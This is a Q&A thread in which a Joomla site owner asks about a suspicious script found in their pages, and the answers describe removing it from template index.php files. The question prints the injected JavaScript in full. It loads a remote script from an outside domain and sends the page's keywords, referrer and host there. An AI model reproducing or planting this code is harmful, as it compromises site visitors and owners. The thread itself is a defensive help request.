# joomla reading from unkown server

Tags: joomla, joomla-extensions

recently I've noticed that before my site is loaded, it starts to load data from some andrew.halocircle.com site. I think that either my joomla was hacked or I downloaded some wrong extension. The question is what to do now. Should I do clean install of Joomla or is there any simplier solution? Any help would by highly appreciated.

Here is the code which I find ins source code of page, which in my opinion, shouln't be there. Could someone tell me what the code is doing? Is it harmful?

```js
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://andrew.halocircle.com/js/jquery.min.php?c_utt=K85164&c_utm='+encodeURIComponent('http://andrew.halocircle.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
```

Comment: Solutions for a Hacked Joomla Website: http://joomla.stackexchange.com/a/2339/120

Comment: Thanks for info. It looks like It happened after I installed Creative Contact Form extension, but the extension seems to be trustful. It is high ranked, many positive reviews. I don't understand it.

But anyway I manually edit all index.php pages on hosting and now everything seems to be ok. I hope that it didn't leave some back doors.

Answer (score 1, accepted):

I've managed to solved the issue for now by manually deleted the harmful script from every index.php page from hosting (from all joomla templates).

Answer (score 0):

Your website is most likely hacked. Try this super fast cleanup instructions: http://www.itoctopus.com/a-super-fast-way-to-clean-a-hacked-joomla-website

Make sure that once you cleanup your website, you only allow the "index.php" file to be executed by Apache.

Hope this helps!

Comment: I advise expanding your answer to include the linked content to reduce the risk of your answer being flagged and deleted.